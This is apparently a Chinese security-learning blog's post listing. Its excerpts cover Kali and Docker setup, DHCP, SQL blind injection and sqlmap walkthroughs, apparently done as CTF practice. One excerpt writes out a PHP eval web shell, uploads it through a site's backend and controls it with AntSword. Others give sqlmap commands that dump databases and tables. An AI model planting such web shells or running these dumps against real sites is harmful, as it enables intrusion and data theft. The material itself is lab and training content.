- 博客(25)
- 收藏
- 关注
转载 kali 安装docker + docker 安装neusse
kali 安装docker + docker 安装neusse更新源镜像apt-get update安装https协议、CA证书、dirmngrapt-get install -y apt-transport-https ca-certificates dirmngr
2021-04-28 13:07:08
1164
2
原创 DHCP部署与安全
1、DHCP作用(Dynamic Host Configure Protocol)自动分配ip地址2、DHCP相关概念地址池/作用域: (ip、 子网掩码、网关、DNS、 租期),DHCP协议端口是UDP 67/683、DHCP优点减少工作量、避免ip冲突、提高地址利用率4、DHCP原理1)客户机发送DHCP Discovery广播包客户机广播请求ip地址(包含客户机的MAC地址)2)服务器响应DHCP Offer广播包服务器响应提供的ip地址(但无子网掩码、网关等参数)3)客户机发送
2021-03-16 15:37:38
177
原创 sql注入盲注
布尔型盲注1.布尔型盲注(以SQLi-LABS Page-1(Basic Challenges) less8 为例子)判断布尔型盲注详情时间盲注
2020-09-23 19:55:56
272
原创 sqlmap注入实战(三)
一、寻找网站注入点得到网站通过burp,抓包,寻找post注入点复制到sqlmap的根目录中,创建一个txt文件输入命令sqlmap.py -r +文件名由此可知,此为注入点二、暴库输入命令sqlmap.py -r +文件名 -dbs输入命令sqlmap.py -r a.txt -D faka --tables获取表输入命令sqlmap.py -r a.txt -D faka -T ayangw_config --columns获取字段名输入命令sqlmap.py -r
2020-09-19 21:32:50
450
1
原创 sqlmap注入实操(二)
一、获取管理员权限详情请点二、制作木马文件<?php @eval($_POST['shell']);?>三、到后台上传木马文件1.上传文件2.上传成功4.上传完成,找到上传文件的位置5.打开,获得网址四、连接蚁剑1.复制URL地址进行连接连接密码为<?php @eval($_POST['']);?>中的中括号里的数据,我这里是a2.连接成功3.读取文件,获得flag发现这里的并不是flag重新寻找,最终发现flag藏在home子目录
2020-09-14 22:36:44
124
原创 sqlmap的安装
安装sqlmap注:要有python环境一、下载安装sqlmap压缩包下载链接二、下载完成解压到python文件夹中三、在桌面上新建一个cmd口令的快捷方式四、修改快捷键属性1、先找到sqlmap解压文件的位置2、右键属性五、检测是否安装成功双击快捷键,输入命令sqlmap.py -u,回车若显示上图样式,即安装成功...
2020-09-13 21:32:10
117
原创 sqlmap注入实操(一)
基础操作语句一、检测注入点是否可用sqlmap存放路径>sqlmap.pu -u+"需要检测的网址"如果有若干询问语句,可添加一个参数sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" --batch二、暴库1.数据库名称sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" --dbs三、web当前使用的数据库 sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" --current -db四、web服务器使用的
2020-09-10 17:02:41
421
1
原创 配置宝塔,搭建网站
配置宝塔面板一、获取虚拟机的IP地址打开虚拟机,输入命令 ip addr获取IP地址二、使用cmd运行获取宝塔面板信息1.运行cmd,并输入命令ssh root@获取的IP地址2.输入登录密码3.获取宝塔的命令行4.输入14命令编号5.获取到登录网站、用户名和密码三、得到信息,到浏览器进行登录根据信息,登录成功四、在宝塔面板中搭建网站1.配置网站 点击网站,选择添加站点,取域名,选择数据库,选择自己所需要的PHP版本2.修改新建站点的网站目录 点击文件,点击
2020-09-10 12:36:37
1095
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人